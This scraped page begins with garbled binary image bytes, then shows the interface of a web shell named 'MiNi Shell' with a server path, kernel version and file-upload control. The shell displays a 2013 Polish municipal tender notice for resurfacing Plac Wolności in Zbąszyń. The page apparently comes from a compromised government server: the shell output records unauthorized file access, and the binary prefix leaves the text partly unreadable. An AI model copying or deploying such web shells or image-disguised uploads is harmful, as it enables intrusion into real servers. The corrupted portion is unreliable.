JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/162765-N-2013.html

<p class="kh_header"><b>Zbąszyń: Przebudowa nawierzchni Placu Wolności w ramach realizowanego projektu pn.: Rewitalizacja zabytkowego Placu Wolności w Zbąszyniu</b><br>
<b>Numer ogłoszenia: 162765 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zbąszyń , ul. por. Żwirki 1, 64-360 Zbąszyń, woj. wielkopolskie, tel. 68 3866009, faks 68 3846010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbaszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni Placu Wolności w ramach realizowanego projektu pn.: Rewitalizacja zabytkowego Placu Wolności w Zbąszyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja inwestycji pod nazwą: Przebudowa nawierzchni Placu Wolności w ramach realizowanego projektu pn.: Rewitalizacja zabytkowego Placu Wolności
w Zbąszyniu. Podstawą do sporządzenia oferty są SIWZ oraz całość dokumentacji projektowej dostępnej na stronie internetowej Zamawiającego. Przedmiot zamówienia zostanie wykonany zgodnie z projektem budowlanym, wykonawczym, sztuką budowlaną oraz wiedzą i doświadczeniem Wykonawcy.
Zakres prac obejmuje:
- rozebranie istniejącej nawierzchni z mieszanek mineralno- bitumicznych wraz z podbudową z kamienia brukowego wg zakresu oznaczonego w projekcie na powierzchni ok. 660 m2.
- wykonanie nawierzchni z kostki kamiennej granitowej o wys. 18 cm na podbudowie z kruszywa stabilizowanego cementem Rm=2,5MPa, grubości 10 cm i z chudego betonu 
Rm=9 MPa grubości 18 cm na powierzchni ok. 28 m2,
- wykonanie nawierzchni z mieszanki mineralno - asfaltowej grubości 13 cm (warstwa wiążąca) po rozbiórce na powierzchni ok. 411 m2 i kostki brukowej starobruk grubości 8 cm na podbudowie z kruszywa stabilizowanego cementem Rm= 2,5 MPa grubości 10 cmi kruszywa łamanego grubości 20 cm na powierzchni 88 m2;
- wykonanie nawierzchni ścieralnej z mieszanki mineralno - asfaltowej grubości 4 cm na całym zakresie objętym projektem na powierzchni ok. 1105 m2;
- ustawienie krawężników stojących 15x30 cm na długości ok. 146 mb i najazdowych 15x22 cm na długości 78 mb
- wykonanie ścieku ulicznego z kostki brukowej szer. 20 cm na długości ok. 142 mb

Szczegółowe informacje zawierają projekt budowlany w zakresie określonym linią przerywaną w kolorze zielonym, szczegółowa specyfikacja techniczna wykonania i odbioru robót dołączone do dokumentacji przetargowej. W/w wielkości przedmiaru mają charakter pomocniczy dla wyceny robót.
Do ceny należy doliczyć:
- ułożenie dywanika asfaltowego na skrzyżowaniu Placu Wolności z ul. 17 Stycznia (na dojeździe do magazynu materiałów budowlanych) wg następującego zestawienia robót:
Frezowanie nawierzchni bitumicznej na połączeniu jezdni i na zjeździe 50 % nawierzchni - 201,34m2,
Ułożenie warstwy wiążącej z mieszanki mineralno  - asfaltowej gr. 3 cm - 147,90 m2,
Oczyszczenie i skropienie nawierzchni emulsją asfaltową - 147,90 m2,
Ułożenie siatki 50 kN - 147,90 m2,
Oczyszczenie i skropienie nawierzchni emulsją asfaltową - 201,34 m2,
Ułożenie mieszanki mineralno - asfaltowej ścieralnej gr. 5 cm - 351,04 m2,
Wykonanie wpustu ulicznego - 1,00 szt.,
Wykonanie przykanalika do studni fi 200 z rury PCV - 27,00 m2.
- regulację studzienek
- przestawienie słupa audiowizualnego z podłączeniem istniejącej kamery video,
- znaki poziome grubowarstwowe z materiału chemoutwardzalnego,
- obsługę geodezyjną z mapą inwentaryzacji powykonawczej potwierdzoną przez właściwy organ.

Zamawiający zapłaci wykonawcy wynagrodzenie ryczałtowe za zakres robót określonych w przedmiocie zamówienia, projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót oraz umowie. Po zakończeniu zadania Wykonawca robót przedłoży kosztorys powykonawczy. Sporządzony kosztorys będzie posiadał charakter wyłącznie pomocniczy i  nie ma wpływu na ustaloną wartość wynagrodzenia ryczałtowego.
W przypadku, gdy w dokumentacji projektowej opisano
materiały lub urządzenia za pomocą podania nazwy ich producenta, patentów lub pochodzenia, to w
odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza ujęcie w ofercie, a następnie
zastosowanie równoważnych materiałów lub urządzeń pod warunkiem posiadania przez nie parametrów co
najmniej takich jak materiały lub urządzenia, które one zastępują.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Na podstawie art. 45 ust. 2 Pzp Zamawiający żąda od Wykonawców
ubiegających się o udzielenie zamówienia wniesienia wadium w kwocie 2 000,00 zł (słownie złotych: dwa tysiące 00/100). Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest do
wniesienia wadium przed upływem terminu składania ofert tj. do dnia 30.08.2013 r. do godz. 12:00.
Wadium może być wnoszone w jednej lub kilku następujących formach: 1) w pieniądzu; 2) poręczeniach
bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy
musi być poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5)
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada
2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
2. Wadium wnoszone w pieniądzu musi być wpłacone przelewem na rachunek bankowy Zamawiającego
nr: 45 1020 4144 0000 6102 0145 9999. Wniesione w ten sposób wadium będzie skuteczne, jeżeli w
podanym wyżej terminie zostanie uznane na rachunku bankowym Zamawiającego. 3. W przypadku
wniesienia wadium w innej formie niż pieniądz, oryginał dokumentu należy złożyć w kasie Urzędu
Miejskiego w Zbąszyniu a poświadczoną za z zgodność z oryginałem kserokopię dołączyć do oferty. 4.
Dopuszcza się możliwość złożenia wadium wraz z ofertą - należy kopię dowodu wniesienia wadium
załączyć do oferty, natomiast oryginał umieścić w osobnej, oznaczonej kopercie: Oryginał dowodu
wniesienia wadium. 5. Wadium wnoszone w pieniądzu na konto Zamawiającego winno mieć tytuł:
Przebudowa Placu Wolności. 6. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ
zostanie wykluczony z postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do wykazania, iż w okresie ostatnich
pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie wykonali (zakończyli) minimum 3 roboty, w ramach których wykonano budowę, przebudowę lub remont drogi z mieszanki mineralno - bitumicznej o wartości co najmniej  100 000 zł (słownie złotych:
sto tysięcy 00/100) brutto każda. Spełnienie warunku w tym zakresie nastąpi poprzez
potwierdzenie wykonania robót w sposób należyty, zgodnie z zasadami sztuki budowlanej i
prawidłowo ukończonych. Ocena spełniania warunku zostanie dokonana w oparciu o wymagane
oświadczenia i dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty wg formuły
spełnia/nie spełnia -wykaz zgodny ze wzorem stanowiącym załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani do dysponowania osobami o kwalifikacjach
zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, a także
zakresu wykonywanych przez nie czynności. Wymagane jest dysponowanie kierownikiem
budowy posiadającym zgodnie z ustawą Prawo Budowlane uprawnienia budowlane
uprawniające do kierowania robotami w specjalności konstrukcyjno-budowlanej drogowej.
Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie oświadczenia
wykonawcy (wg wzoru stanowiącego załącznik nr 6 do SIWZ), że osoba, która będzie
uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienienia wg formuły
spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku wykonawcy zobowiązani są do posiadania dostępu lub dysponowania
środkami finansowymi w kwocie nie mniejszej niż 150 000 zł (słownie złotych: sto pięćdziesiąt tysięcy
00/100). Ocena spełniania warunku zostanie dokonana w oparciu o wymagane oświadczenia i
dokumenty jakie wykonawcy zobowiązani są dołączyć do oferty wg formuły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli oferta jest podpisana przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności
gospodarczej należy załączyć do oferty pełnomocnictwo - oryginał lub kopia poświadczona notarialnie.
2.Wykonawcy ubiegający się wspólnie o udzielenie zamówienia winni załączyć dokument ustanawiający
pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli Wykonawca, wykazując
spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp., polega na zasobach innych podmiotów
na zasadach określonych w art. 26 ust. 2b ustawy P.z.p., Zamawiający, w celu oceny, czy Wykonawca
będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania
zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty
dostęp do ich zasobów, żąda przedłożenia dokumentów dotyczących: 1) zakresu dostępnych wykonawcy
zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy
wykonywaniu zamówienia, 3) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 4)
zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia Uwaga: W postępowaniach o
udzielenie zamówienia publicznego wszczynanych w okresie od 20 lutego 2013 r. do 20 lutego 2014 r.
Wykonawca w miejsce poświadczeń, o których mowa w pkt VI.8. SIWZ może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z
zasadami sztuki budowlanej i ich prawidłowe ukończenie określone w rozporządzeniu Prezesa Rady
Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). W
przypadku, gdy roboty budowlane, dostawy lub usługi wskazane w wykazie, o którym mowa w pkt VI.3.1)
SIWZ zostały wcześniej wykonane na rzecz Zamawiającego, Wykonawca nie ma obowiązku przedkładania
dowodów, o których mowa w pkt VI.8.SIWZ. W razie konieczności, szczególnie gdy wykaz lub dowody,
budzą wątpliwości Zamawiającego lub gdy z poświadczenia lub innego dokumentu wynika, że zamówienia
nie zostało wykonane lub zostało wykonane nienależycie Zamawiający może zwrócić się bezpośrednio do
właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były lub miały zostać
wykonane, o przedłożenie dodatkowych informacji lub dokumentów, bezpośrednio Zamawiającemu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wykaz zmian zamieszczono we wzorze umowy (zał. nr 8 do SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zbaszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Zbąszyniu ul. por. Żwirki 1, 64-360 Zbąszyń (pok.25)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 12:00, miejsce: Urząd Miejski w Zbąszyniu ul. por. Żwirki 1, 64-360 Zbąszyń (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com